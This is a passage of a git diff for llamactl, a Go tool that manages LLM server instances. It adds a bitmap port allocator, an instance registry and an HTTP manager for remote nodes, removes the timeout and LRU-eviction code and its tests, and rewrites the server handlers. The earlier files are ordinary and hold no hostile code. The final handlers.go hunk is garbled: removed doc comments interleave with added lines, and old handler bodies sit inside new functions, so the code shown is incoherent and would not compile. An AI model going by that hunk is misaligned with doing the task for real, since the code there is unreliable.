 		return fmt.Errorf("port %d is out of range [%d-%d]", port, p.minPort, p.maxPort)
 	}
 	p.mu.Lock()
 	defer p.mu.Unlock()
 	if p.isBitSet(port) {
 		return fmt.Errorf("port %d is already allocated", port)
 	}
 	p.setBit(port)
 	p.allocated[port] = instanceName
 	return nil
 }
 // release releases a specific port, making it available for reuse.
 // Returns an error if the port is not allocated.
 func (p *portAllocator) release(port int) error {
 	if port < p.minPort || port > p.maxPort {
 		return fmt.Errorf("port %d is out of range [%d-%d]", port, p.minPort, p.maxPort)
 	}
 	p.mu.Lock()
 	defer p.mu.Unlock()
 	if !p.isBitSet(port) {
 		return fmt.Errorf("port %d is not allocated", port)
 	}
 	p.clearBit(port)
 	delete(p.allocated, port)
 	return nil
 }
 // releaseByInstance releases all ports allocated to the given instance.
 // This is useful for cleanup when deleting or updating an instance.
 // Returns the number of ports released.
 func (p *portAllocator) releaseByInstance(instanceName string) int {
 	if instanceName == "" {
 		return 0
 	}
 	p.mu.Lock()
 	defer p.mu.Unlock()
 	portsToRelease := make([]int, 0)
 	for port, name := range p.allocated {
 		if name == instanceName {
 			portsToRelease = append(portsToRelease, port)
 		}
 	}
 	for _, port := range portsToRelease {
 		p.clearBit(port)
 		delete(p.allocated, port)
 	}
 	return len(portsToRelease)
 }
 // --- Internal bitmap operations ---
 // portToBitPos converts a port number to bitmap array index and bit position.
 func (p *portAllocator) portToBitPos(port int) (index int, bit uint) {
 	offset := port - p.minPort
 	index = offset / 64
 	bit = uint(offset % 64)
 	return
 }
 // setBit marks a port as allocated in the bitmap.
 func (p *portAllocator) setBit(port int) {
 	index, bit := p.portToBitPos(port)
 	p.bitmap[index] |= (1 << bit)
 }
 // clearBit marks a port as free in the bitmap.
 func (p *portAllocator) clearBit(port int) {
 	index, bit := p.portToBitPos(port)
 	p.bitmap[index] &^= (1 << bit)
 }
 // isBitSet checks if a port is allocated in the bitmap.
 func (p *portAllocator) isBitSet(port int) bool {
 	index, bit := p.portToBitPos(port)
 	return (p.bitmap[index] & (1 << bit)) != 0
 }
 // findFirstFreeBit scans the bitmap to find the first unallocated port.
 // Returns the port number or an error if no ports are available.
 func (p *portAllocator) findFirstFreeBit() (int, error) {
 	for i, word := range p.bitmap {
 		if word != ^uint64(0) { // Not all bits are set (some ports are free)
 			// Find the first 0 bit in this word
 			// XOR with all 1s to flip bits, then find first 1 (which was 0)
 			bit := bits.TrailingZeros64(^word)
 			port := p.minPort + (i * 64) + bit
 			// Ensure we don't go beyond maxPort due to bitmap rounding
 			if port <= p.maxPort {
 				return port, nil
 			}
 		}
 	}
 	return 0, fmt.Errorf("no available ports in range [%d-%d]", p.minPort, p.maxPort)
 }
--- a/pkg/manager/registry.go
+++ b/pkg/manager/registry.go
@@ -0,0 +1,121 @@
 package manager
 import (
 	"fmt"
 	"llamactl/pkg/instance"
 	"sync"
 )
 // instanceRegistry provides thread-safe storage and lookup of instances
 // with running state tracking using lock-free sync.Map for status checks.
 type instanceRegistry struct {
 	mu        sync.RWMutex
 	instances map[string]*instance.Instance
 	running   sync.Map // map[string]struct{} - lock-free for status checks
 }
 // newInstanceRegistry creates a new instance registry.
 func newInstanceRegistry() *instanceRegistry {
 	return &instanceRegistry{
 		instances: make(map[string]*instance.Instance),
 	}
 }
 // Get retrieves an instance by name.
 // Returns the instance and true if found, nil and false otherwise.
 func (r *instanceRegistry) get(name string) (*instance.Instance, bool) {
 	r.mu.RLock()
 	defer r.mu.RUnlock()
 	inst, exists := r.instances[name]
 	return inst, exists
 }
 // List returns a snapshot copy of all instances to prevent external mutation.
 func (r *instanceRegistry) list() []*instance.Instance {
 	r.mu.RLock()
 	defer r.mu.RUnlock()
 	result := make([]*instance.Instance, 0, len(r.instances))
 	for _, inst := range r.instances {
 		result = append(result, inst)
 	}
 	return result
 }
 // ListRunning returns a snapshot of all currently running instances.
 func (r *instanceRegistry) listRunning() []*instance.Instance {
 	r.mu.RLock()
 	defer r.mu.RUnlock()
 	result := make([]*instance.Instance, 0)
 	for name, inst := range r.instances {
 		if _, isRunning := r.running.Load(name); isRunning {
 			result = append(result, inst)
 		}
 	}
 	return result
 }
 // Add adds a new instance to the registry.
 // Returns an error if an instance with the same name already exists.
 func (r *instanceRegistry) add(inst *instance.Instance) error {
 	if inst == nil {
 		return fmt.Errorf("cannot add nil instance")
 	}
 	r.mu.Lock()
 	defer r.mu.Unlock()
 	if _, exists := r.instances[inst.Name]; exists {
 		return fmt.Errorf("instance %s already exists", inst.Name)
 	}
 	r.instances[inst.Name] = inst
 	// Initialize running state if the instance is running
 	if inst.IsRunning() {
 		r.running.Store(inst.Name, struct{}{})
 	}
 	return nil
 }
 // Remove removes an instance from the registry.
 // Returns an error if the instance doesn't exist.
 func (r *instanceRegistry) remove(name string) error {
 	r.mu.Lock()
 	defer r.mu.Unlock()
 	if _, exists := r.instances[name]; !exists {
 		return fmt.Errorf("instance %s not found", name)
 	}
 	delete(r.instances, name)
 	r.running.Delete(name)
 	return nil
 }
 // MarkRunning marks an instance as running using lock-free sync.Map.
 func (r *instanceRegistry) markRunning(name string) {
 	r.running.Store(name, struct{}{})
 }
 // MarkStopped marks an instance as stopped using lock-free sync.Map.
 func (r *instanceRegistry) markStopped(name string) {
 	r.running.Delete(name)
 }
 // IsRunning checks if an instance is running using lock-free sync.Map.
 func (r *instanceRegistry) isRunning(name string) bool {
 	_, isRunning := r.running.Load(name)
 	return isRunning
 }
 // Count returns the total number of instances in the registry.
 func (r *instanceRegistry) count() int {
 	r.mu.RLock()
 	defer r.mu.RUnlock()
 	return len(r.instances)
 }
--- a/pkg/manager/remote.go
+++ b/pkg/manager/remote.go
@@ -0,0 +1,293 @@
 package manager
 import (
 	"bytes"
 	"context"
 	"encoding/json"
 	"fmt"
 	"io"
 	"llamactl/pkg/config"
 	"llamactl/pkg/instance"
 	"net/http"
 	"net/url"
 	"sync"
 	"time"
 )
 const apiBasePath = "/api/v1/instances/"
 // remoteManager handles HTTP operations for remote instances.
 type remoteManager struct {
 	mu             sync.RWMutex
 	client         *http.Client
 	nodeMap        map[string]*config.NodeConfig // node name -> node config
 	instanceToNode map[string]*config.NodeConfig // instance name -> node config
 }
 // newRemoteManager creates a new remote manager.
 func newRemoteManager(nodes map[string]config.NodeConfig, timeout time.Duration) *remoteManager {
 	if timeout <= 0 {
 		timeout = 30 * time.Second
 	}
 	// Build node config map
 	nodeMap := make(map[string]*config.NodeConfig)
 	for name := range nodes {
 		nodeCopy := nodes[name]
 		nodeMap[name] = &nodeCopy
 	}
 	return &remoteManager{
 		client: &http.Client{
 			Timeout: timeout,
 		},
 		nodeMap:        nodeMap,
 		instanceToNode: make(map[string]*config.NodeConfig),
 	}
 }
 // GetNodeForInstance returns the node configuration for a given instance.
 // Returns nil if the instance is not mapped to any node.
 func (rm *remoteManager) getNodeForInstance(instanceName string) (*config.NodeConfig, bool) {
 	rm.mu.RLock()
 	defer rm.mu.RUnlock()
 	node, exists := rm.instanceToNode[instanceName]
 	return node, exists
 }
 // SetInstanceNode maps an instance to a specific node.
 // Returns an error if the node doesn't exist.
 func (rm *remoteManager) setInstanceNode(instanceName, nodeName string) error {
 	rm.mu.Lock()
 	defer rm.mu.Unlock()
 	node, exists := rm.nodeMap[nodeName]
 	if !exists {
 		return fmt.Errorf("node %s not found", nodeName)
 	}
 	rm.instanceToNode[instanceName] = node
 	return nil
 }
 // RemoveInstance removes the instance-to-node mapping.
 func (rm *remoteManager) removeInstance(instanceName string) {
 	rm.mu.Lock()
 	defer rm.mu.Unlock()
 	delete(rm.instanceToNode, instanceName)
 }
 // --- HTTP request helpers ---
 // makeRemoteRequest creates and executes an HTTP request to a remote node with context support.
 func (rm *remoteManager) makeRemoteRequest(ctx context.Context, nodeConfig *config.NodeConfig, method, path string, body any) (*http.Response, error) {
 	var reqBody io.Reader
 	if body != nil {
 		jsonData, err := json.Marshal(body)
 		if err != nil {
 			return nil, fmt.Errorf("failed to marshal request body: %w", err)
 		}
 		reqBody = bytes.NewBuffer(jsonData)
 	}
 	url := fmt.Sprintf("%s%s", nodeConfig.Address, path)
 	req, err := http.NewRequestWithContext(ctx, method, url, reqBody)
 	if err != nil {
 		return nil, fmt.Errorf("failed to create request: %w", err)
 	}
 	if body != nil {
 		req.Header.Set("Content-Type", "application/json")
 	}
 	if nodeConfig.APIKey != "" {
 		req.Header.Set("Authorization", fmt.Sprintf("Bearer %s", nodeConfig.APIKey))
 	}
 	resp, err := rm.client.Do(req)
 	if err != nil {
 		return nil, fmt.Errorf("failed to execute request: %w", err)
 	}
 	return resp, nil
 }
 // parseRemoteResponse parses an HTTP response and unmarshals the result.
 func parseRemoteResponse(resp *http.Response, result any) error {
 	defer resp.Body.Close()
 	body, err := io.ReadAll(resp.Body)
 	if err != nil {
 		return fmt.Errorf("failed to read response body: %w", err)
 	}
 	if resp.StatusCode < 200 || resp.StatusCode >= 300 {
 		return fmt.Errorf("API request failed with status %d: %s", resp.StatusCode, string(body))
 	}
 	if result != nil {
 		if err := json.Unmarshal(body, result); err != nil {
 			return fmt.Errorf("failed to unmarshal response: %w", err)
 		}
 	}
 	return nil
 }
 // --- Remote CRUD operations ---
 // createInstance creates a new instance on a remote node.
 func (rm *remoteManager) createInstance(ctx context.Context, node *config.NodeConfig, name string, opts *instance.Options) (*instance.Instance, error) {
 	escapedName := url.PathEscape(name)
 	path := fmt.Sprintf("%s%s/", apiBasePath, escapedName)
 	resp, err := rm.makeRemoteRequest(ctx, node, "POST", path, opts)
 	if err != nil {
 		return nil, err
 	}
 	var inst instance.Instance
 	if err := parseRemoteResponse(resp, &inst); err != nil {
 		return nil, err
 	}
 	return &inst, nil
 }
 // getInstance retrieves an instance by name from a remote node.
 func (rm *remoteManager) getInstance(ctx context.Context, node *config.NodeConfig, name string) (*instance.Instance, error) {
 	escapedName := url.PathEscape(name)
 	path := fmt.Sprintf("%s%s/", apiBasePath, escapedName)
 	resp, err := rm.makeRemoteRequest(ctx, node, "GET", path, nil)
 	if err != nil {
 		return nil, err
 	}
 	var inst instance.Instance
 	if err := parseRemoteResponse(resp, &inst); err != nil {
 		return nil, err
 	}
 	return &inst, nil
 }
 // updateInstance updates an existing instance on a remote node.
 func (rm *remoteManager) updateInstance(ctx context.Context, node *config.NodeConfig, name string, opts *instance.Options) (*instance.Instance, error) {
 	escapedName := url.PathEscape(name)
 	path := fmt.Sprintf("%s%s/", apiBasePath, escapedName)
 	resp, err := rm.makeRemoteRequest(ctx, node, "PUT", path, opts)
 	if err != nil {
 		return nil, err
 	}
 	var inst instance.Instance
 	if err := parseRemoteResponse(resp, &inst); err != nil {
 		return nil, err
 	}
 	return &inst, nil
 }
 // deleteInstance deletes an instance from a remote node.
 func (rm *remoteManager) deleteInstance(ctx context.Context, node *config.NodeConfig, name string) error {
 	escapedName := url.PathEscape(name)
 	path := fmt.Sprintf("%s%s/", apiBasePath, escapedName)
 	resp, err := rm.makeRemoteRequest(ctx, node, "DELETE", path, nil)
 	if err != nil {
 		return err
 	}
 	return parseRemoteResponse(resp, nil)
 }
 // startInstance starts an instance on a remote node.
 func (rm *remoteManager) startInstance(ctx context.Context, node *config.NodeConfig, name string) (*instance.Instance, error) {
 	escapedName := url.PathEscape(name)
 	path := fmt.Sprintf("%s%s/start", apiBasePath, escapedName)
 	resp, err := rm.makeRemoteRequest(ctx, node, "POST", path, nil)
 	if err != nil {
 		return nil, err
 	}
 	var inst instance.Instance
 	if err := parseRemoteResponse(resp, &inst); err != nil {
 		return nil, err
 	}
 	return &inst, nil
 }
 // stopInstance stops an instance on a remote node.
 func (rm *remoteManager) stopInstance(ctx context.Context, node *config.NodeConfig, name string) (*instance.Instance, error) {
 	escapedName := url.PathEscape(name)
 	path := fmt.Sprintf("%s%s/stop", apiBasePath, escapedName)
 	resp, err := rm.makeRemoteRequest(ctx, node, "POST", path, nil)
 	if err != nil {
 		return nil, err
 	}
 	var inst instance.Instance
 	if err := parseRemoteResponse(resp, &inst); err != nil {
 		return nil, err
 	}
 	return &inst, nil
 }
 // restartInstance restarts an instance on a remote node.
 func (rm *remoteManager) restartInstance(ctx context.Context, node *config.NodeConfig, name string) (*instance.Instance, error) {
 	escapedName := url.PathEscape(name)
 	path := fmt.Sprintf("%s%s/restart", apiBasePath, escapedName)
 	resp, err := rm.makeRemoteRequest(ctx, node, "POST", path, nil)
 	if err != nil {
 		return nil, err
 	}
 	var inst instance.Instance
 	if err := parseRemoteResponse(resp, &inst); err != nil {
 		return nil, err
 	}
 	return &inst, nil
 }
 // getInstanceLogs retrieves logs for an instance from a remote node.
 func (rm *remoteManager) getInstanceLogs(ctx context.Context, node *config.NodeConfig, name string, numLines int) (string, error) {
 	escapedName := url.PathEscape(name)
 	path := fmt.Sprintf("%s%s/logs?lines=%d", apiBasePath, escapedName, numLines)
 	resp, err := rm.makeRemoteRequest(ctx, node, "GET", path, nil)
 	if err != nil {
 		return "", err
 	}
 	defer resp.Body.Close()
 	body, err := io.ReadAll(resp.Body)
 	if err != nil {
 		return "", fmt.Errorf("failed to read response body: %w", err)
 	}
 	if resp.StatusCode < 200 || resp.StatusCode >= 300 {
 		return "", fmt.Errorf("API request failed with status %d: %s", resp.StatusCode, string(body))
 	}
 	// Logs endpoint returns plain text (Content-Type: text/plain)
 	return string(body), nil
 }
--- a/pkg/manager/timeout.go
+++ b/pkg/manager/timeout.go
@@ -1,64 +0,0 @@
 package manager
 import (
 	"fmt"
 	"llamactl/pkg/instance"
 	"log"
 )
 func (im *instanceManager) checkAllTimeouts() {
 	im.mu.RLock()
 	var timeoutInstances []string
 	// Identify instances that should timeout
 	for _, inst := range im.instances {
 		if inst.ShouldTimeout() {
 			timeoutInstances = append(timeoutInstances, inst.Name)
 		}
 	}
 	im.mu.RUnlock() // Release read lock before calling StopInstance
 	// Stop the timed-out instances
 	for _, name := range timeoutInstances {
 		log.Printf("Instance %s has timed out, stopping it", name)
 		if _, err := im.StopInstance(name); err != nil {
 			log.Printf("Error stopping instance %s: %v", name, err)
 		} else {
 			log.Printf("Instance %s stopped successfully", name)
 		}
 	}
 }
 // EvictLRUInstance finds and stops the least recently used running instance.
 func (im *instanceManager) EvictLRUInstance() error {
 	im.mu.RLock()
 	var lruInstance *instance.Process
 	for name, _ := range im.runningInstances {
 		inst := im.instances[name]
 		if inst == nil {
 			continue
 		}
 		if inst.GetOptions() != nil && inst.GetOptions().IdleTimeout != nil && *inst.GetOptions().IdleTimeout <= 0 {
 			continue // Skip instances without idle timeout
 		}
 		if lruInstance == nil {
 			lruInstance = inst
 		}
 		if inst.LastRequestTime() < lruInstance.LastRequestTime() {
 			lruInstance = inst
 		}
 	}
 	im.mu.RUnlock()
 	if lruInstance == nil {
 		return fmt.Errorf("failed to find lru instance")
 	}
 	// Evict Instance
 	_, err := im.StopInstance(lruInstance.Name)
 	return err
 }
--- a/pkg/manager/timeout_test.go
+++ b/pkg/manager/timeout_test.go
@@ -1,332 +0,0 @@
 package manager_test
 import (
 	"llamactl/pkg/backends"
 	"llamactl/pkg/backends/llamacpp"
 	"llamactl/pkg/config"
 	"llamactl/pkg/instance"
 	"llamactl/pkg/manager"
 	"sync"
 	"testing"
 	"time"
 )
 func TestTimeoutFunctionality(t *testing.T) {
 	// Test timeout checker initialization
 	backendConfig := config.BackendConfig{
 		LlamaExecutable: "llama-server",
 		MLXLMExecutable: "mlx_lm.server",
 	}
 	cfg := config.InstancesConfig{
 		PortRange:            [2]int{8000, 9000},
 		TimeoutCheckInterval: 10,
 		MaxInstances:         5,
 	}
 	manager := manager.NewInstanceManager(backendConfig, cfg)
 	if manager == nil {
 		t.Fatal("Manager should be initialized with timeout checker")
 	}
 	manager.Shutdown() // Clean up
 	// Test timeout configuration and logic without starting the actual process
 	testManager := createTestManager()
 	defer testManager.Shutdown()
 	idleTimeout := 1 // 1 minute
 	options := &instance.CreateInstanceOptions{
 		IdleTimeout: &idleTimeout,
 		BackendType: backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 		},
 	}
 	inst, err := testManager.CreateInstance("timeout-test", options)
 	if err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	// Test timeout configuration is properly set
 	if inst.GetOptions().IdleTimeout == nil {
 		t.Fatal("Instance should have idle timeout configured")
 	}
 	if *inst.GetOptions().IdleTimeout != 1 {
 		t.Errorf("Expected idle timeout 1 minute, got %d", *inst.GetOptions().IdleTimeout)
 	}
 	// Test timeout logic without actually starting the process
 	// Create a mock time provider to simulate timeout
 	mockTime := NewMockTimeProvider(time.Now())
 	inst.SetTimeProvider(mockTime)
 	// Set instance to running state so timeout logic can work
 	inst.SetStatus(instance.Running)
 	// Simulate instance being "running" for timeout check (without actual process)
 	// We'll test the ShouldTimeout logic directly
 	inst.UpdateLastRequestTime()
 	// Initially should not timeout (just updated)
 	if inst.ShouldTimeout() {
 		t.Error("Instance should not timeout immediately after request")
 	}
 	// Advance time to trigger timeout
 	mockTime.SetTime(time.Now().Add(2 * time.Minute))
 	// Now it should timeout
 	if !inst.ShouldTimeout() {
 		t.Error("Instance should timeout after idle period")
 	}
 	// Reset running state to avoid shutdown issues
 	inst.SetStatus(instance.Stopped)
 	// Test that instance without timeout doesn't timeout
 	noTimeoutOptions := &instance.CreateInstanceOptions{
 		BackendType: backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model.gguf",
 		},
 		// No IdleTimeout set
 	}
 	noTimeoutInst, err := testManager.CreateInstance("no-timeout-test", noTimeoutOptions)
 	if err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	noTimeoutInst.SetTimeProvider(mockTime)
 	noTimeoutInst.SetStatus(instance.Running) // Set to running for timeout check
 	noTimeoutInst.UpdateLastRequestTime()
 	// Even with time advanced, should not timeout
 	if noTimeoutInst.ShouldTimeout() {
 		t.Error("Instance without timeout configuration should never timeout")
 	}
 	// Reset running state to avoid shutdown issues
 	noTimeoutInst.SetStatus(instance.Stopped)
 }
 func TestEvictLRUInstance_Success(t *testing.T) {
 	manager := createTestManager()
 	// Don't defer manager.Shutdown() - we'll handle cleanup manually
 	// Create 3 instances with idle timeout enabled (value doesn't matter for LRU logic)
 	options1 := &instance.CreateInstanceOptions{
 		BackendType: backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model1.gguf",
 		},
 		IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
 	}
 	options2 := &instance.CreateInstanceOptions{
 		BackendType: backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model2.gguf",
 		},
 		IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
 	}
 	options3 := &instance.CreateInstanceOptions{
 		BackendType: backends.BackendTypeLlamaCpp,
 		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Model: "/path/to/model3.gguf",
 		},
 		IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
 	}
 	inst1, err := manager.CreateInstance("instance-1", options1)
 	if err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	inst2, err := manager.CreateInstance("instance-2", options2)
 	if err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	inst3, err := manager.CreateInstance("instance-3", options3)
 	if err != nil {
 		t.Fatalf("CreateInstance failed: %v", err)
 	}
 	// Set up mock time and set instances to running
 	mockTime := NewMockTimeProvider(time.Now())
 	inst1.SetTimeProvider(mockTime)
 	inst2.SetTimeProvider(mockTime)
 	inst3.SetTimeProvider(mockTime)
 	inst1.SetStatus(instance.Running)
 	inst2.SetStatus(instance.Running)
 	inst3.SetStatus(instance.Running)
 	// Set different last request times (oldest to newest)
 	// inst1: oldest (will be evicted)
 	inst1.UpdateLastRequestTime()
 	mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
 	inst2.UpdateLastRequestTime()
 	mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
 	inst3.UpdateLastRequestTime()
 	// Evict LRU instance (should be inst1)
 	err = manager.EvictLRUInstance()
 	if err != nil {
 		t.Fatalf("EvictLRUInstance failed: %v", err)
 	}
 	// Verify inst1 is stopped
 	if inst1.IsRunning() {
 		t.Error("Expected instance-1 to be stopped after eviction")
 	}
 	// Verify inst2 and inst3 are still running
 	if !inst2.IsRunning() {
 		t.Error("Expected instance-2 to still be running")
 	}
 	if !inst3.IsRunning() {
 		t.Error("Expected instance-3 to still be running")
 	}
 	// Clean up manually - set all to stopped and then shutdown
 	inst2.SetStatus(instance.Stopped)
 	inst3.SetStatus(instance.Stopped)
 }
 func TestEvictLRUInstance_NoEligibleInstances(t *testing.T) {
 	// Helper function to create instances with different timeout configurations
 	createInstanceWithTimeout := func(manager manager.InstanceManager, name, model string, timeout *int) *instance.Process {
 		options := &instance.CreateInstanceOptions{
 			BackendType: backends.BackendTypeLlamaCpp,
 			LlamaServerOptions: &llamacpp.LlamaServerOptions{
 				Model: model,
 			},
 			IdleTimeout: timeout,
 		}
 		inst, err := manager.CreateInstance(name, options)
 		if err != nil {
 			t.Fatalf("CreateInstance failed: %v", err)
 		}
 		return inst
 	}
 	t.Run("no running instances", func(t *testing.T) {
 		manager := createTestManager()
 		defer manager.Shutdown()
 		err := manager.EvictLRUInstance()
 		if err == nil {
 			t.Error("Expected error when no running instances exist")
 		}
 		if err.Error() != "failed to find lru instance" {
 			t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
 		}
 	})
 	t.Run("only instances without timeout", func(t *testing.T) {
 		manager := createTestManager()
 		defer manager.Shutdown()
 		// Create instances with various non-eligible timeout configurations
 		zeroTimeout := 0
 		negativeTimeout := -1
 		inst1 := createInstanceWithTimeout(manager, "no-timeout-1", "/path/to/model1.gguf", &zeroTimeout)
 		inst2 := createInstanceWithTimeout(manager, "no-timeout-2", "/path/to/model2.gguf", &negativeTimeout)
 		inst3 := createInstanceWithTimeout(manager, "no-timeout-3", "/path/to/model3.gguf", nil)
 		// Set instances to running
 		instances := []*instance.Process{inst1, inst2, inst3}
 		for _, inst := range instances {
 			inst.SetStatus(instance.Running)
 		}
 		defer func() {
 			// Reset instances to stopped to avoid shutdown panics
 			for _, inst := range instances {
 				inst.SetStatus(instance.Stopped)
 			}
 		}()
 		// Try to evict - should fail because no eligible instances
 		err := manager.EvictLRUInstance()
 		if err == nil {
 			t.Error("Expected error when no eligible instances exist")
 		}
 		if err.Error() != "failed to find lru instance" {
 			t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
 		}
 		// Verify all instances are still running
 		for i, inst := range instances {
 			if !inst.IsRunning() {
 				t.Errorf("Expected instance %d to still be running", i+1)
 			}
 		}
 	})
 	t.Run("mixed instances - evicts only eligible ones", func(t *testing.T) {
 		manager := createTestManager()
 		defer manager.Shutdown()
 		// Create mix of instances: some with timeout enabled, some disabled
 		validTimeout := 1
 		zeroTimeout := 0
 		instWithTimeout := createInstanceWithTimeout(manager, "with-timeout", "/path/to/model-with-timeout.gguf", &validTimeout)
 		instNoTimeout1 := createInstanceWithTimeout(manager, "no-timeout-1", "/path/to/model-no-timeout1.gguf", &zeroTimeout)
 		instNoTimeout2 := createInstanceWithTimeout(manager, "no-timeout-2", "/path/to/model-no-timeout2.gguf", nil)
 		// Set all instances to running
 		instances := []*instance.Process{instWithTimeout, instNoTimeout1, instNoTimeout2}
 		for _, inst := range instances {
 			inst.SetStatus(instance.Running)
 			inst.UpdateLastRequestTime()
 		}
 		defer func() {
 			// Reset instances to stopped to avoid shutdown panics
 			for _, inst := range instances {
 				if inst.IsRunning() {
 					inst.SetStatus(instance.Stopped)
 				}
 			}
 		}()
 		// Evict LRU instance - should only consider the one with timeout
 		err := manager.EvictLRUInstance()
 		if err != nil {
 			t.Fatalf("EvictLRUInstance failed: %v", err)
 		}
 		// Verify only the instance with timeout was evicted
 		if instWithTimeout.IsRunning() {
 			t.Error("Expected with-timeout instance to be stopped after eviction")
 		}
 		if !instNoTimeout1.IsRunning() {
 			t.Error("Expected no-timeout-1 instance to still be running")
 		}
 		if !instNoTimeout2.IsRunning() {
 			t.Error("Expected no-timeout-2 instance to still be running")
 		}
 	})
 }
 // Helper for timeout tests
 type MockTimeProvider struct {
 	currentTime time.Time
 	mu          sync.RWMutex
 }
 func NewMockTimeProvider(t time.Time) *MockTimeProvider {
 	return &MockTimeProvider{currentTime: t}
 }
 func (m *MockTimeProvider) Now() time.Time {
 	m.mu.RLock()
 	defer m.mu.RUnlock()
 	return m.currentTime
 }
 func (m *MockTimeProvider) SetTime(t time.Time) {
 	m.mu.Lock()
 	defer m.mu.Unlock()
 	m.currentTime = t
 }
--- a/pkg/server/handlers.go
+++ b/pkg/server/handlers.go
@@ -1,795 +1,115 @@
 package server
 import (
 	"bytes"
 	"encoding/json"
 	"fmt"
 	"io"
 	"llamactl/pkg/backends"
 	"llamactl/pkg/backends/llamacpp"
 	"llamactl/pkg/backends/mlx"
 	"llamactl/pkg/backends/vllm"
 	"llamactl/pkg/config"
 	"llamactl/pkg/instance"
 	"llamactl/pkg/manager"
 	"llamactl/pkg/validation"
 	"log"
 	"net/http"
-	"os/exec"
+	"time"
 	"strconv"
 	"strings"
 	"github.com/go-chi/chi/v5"
 )
 // errorResponse represents an error response returned by the API
 type errorResponse struct {
 	Error   string `json:"error"`
 	Details string `json:"details,omitempty"`
 }
 // writeError writes a JSON error response with the specified HTTP status code
 func writeError(w http.ResponseWriter, status int, code, details string) {
 	w.Header().Set("Content-Type", "application/json")
 	w.WriteHeader(status)
 	if err := json.NewEncoder(w).Encode(errorResponse{Error: code, Details: details}); err != nil {
 		log.Printf("Failed to encode error response: %v", err)
 	}
 }
 // writeJSON writes a JSON response with the specified HTTP status code
 func writeJSON(w http.ResponseWriter, status int, data any) {
 	w.Header().Set("Content-Type", "application/json")
 	w.WriteHeader(status)
 	if err := json.NewEncoder(w).Encode(data); err != nil {
 		log.Printf("Failed to encode JSON response: %v", err)
 	}
 }
 // writeText writes a plain text response with the specified HTTP status code
 func writeText(w http.ResponseWriter, status int, data string) {
 	w.Header().Set("Content-Type", "text/plain")
 	w.WriteHeader(status)
 	if _, err := w.Write([]byte(data)); err != nil {
 		log.Printf("Failed to write text response: %v", err)
 	}
 }
 // Handler provides HTTP handlers for the llamactl server API
 type Handler struct {
 	InstanceManager manager.InstanceManager
 	cfg             config.AppConfig
 	httpClient      *http.Client
 }
 // NewHandler creates a new Handler instance with the provided instance manager and configuration
 func NewHandler(im manager.InstanceManager, cfg config.AppConfig) *Handler {
 	return &Handler{
 		InstanceManager: im,
 		cfg:             cfg,
 		httpClient: &http.Client{
 			Timeout: 30 * time.Second,
 		},
 	}
 }
-// VersionHandler godoc
+// getInstance retrieves an instance by name from the request query parameters
-// @Summary Get llamactl version
+func (h *Handler) getInstance(r *http.Request) (*instance.Instance, error) {
-// @Description Returns the version of the llamactl command
+	name := chi.URLParam(r, "name")
-// @Tags version
+	validatedName, err := validation.ValidateInstanceName(name)
-// @Security ApiKeyAuth
+	if err != nil {
-// @Produces text/plain
+		return nil, fmt.Errorf("invalid instance name: %w", err)
 // @Success 200 {string} string "Version information"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /version [get]
 func (h *Handler) VersionHandler() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		w.Header().Set("Content-Type", "text/plain")
 		fmt.Fprintf(w, "Version: %s\nCommit: %s\nBuild Time: %s\n", h.cfg.Version, h.cfg.CommitHash, h.cfg.BuildTime)
 	}
 	inst, err := h.InstanceManager.GetInstance(validatedName)
 	if err != nil {
 		return nil, fmt.Errorf("failed to get instance by name: %w", err)
 	}
 	return inst, nil
 }
-// LlamaServerHelpHandler godoc
+// ensureInstanceRunning ensures the instance is running by starting it if on-demand start is enabled
-// @Summary Get help for llama server
+// It handles LRU eviction when the maximum number of running instances is reached
-// @Description Returns the help text for the llama server command
+func (h *Handler) ensureInstanceRunning(inst *instance.Instance) error {
-// @Tags backends
+	options := inst.GetOptions()
-// @Security ApiKeyAuth
+	allowOnDemand := options != nil && options.OnDemandStart != nil && *options.OnDemandStart
-// @Produces text/plain
+	if !allowOnDemand {
-// @Success 200 {string} string "Help text"
+		return fmt.Errorf("instance is not running and on-demand start is not enabled")
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /backends/llama-cpp/help [get]
 func (h *Handler) LlamaServerHelpHandler() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		helpCmd := exec.Command("llama-server", "--help")
 		output, err := helpCmd.CombinedOutput()
 		if err != nil {
 			http.Error(w, "Failed to get help: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
 		w.Header().Set("Content-Type", "text/plain")
 		w.Write(output)
 	}
 }
-// LlamaServerVersionHandler godoc
+	if h.InstanceManager.IsMaxRunningInstancesReached() {
-// @Summary Get version of llama server
+		if h.cfg.Instances.EnableLRUEviction {
-// @Description Returns the version of the llama server command
+			err := h.InstanceManager.EvictLRUInstance()
-// @Tags backends
+			if err != nil {
-// @Security ApiKeyAuth
+				return fmt.Errorf("cannot start instance, failed to evict instance: %w", err)
 // @Produces text/plain
 // @Success 200 {string} string "Version information"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /backends/llama-cpp/version [get]
 func (h *Handler) LlamaServerVersionHandler() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		versionCmd := exec.Command("llama-server", "--version")
 		output, err := versionCmd.CombinedOutput()
 		if err != nil {
 			http.Error(w, "Failed to get version: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
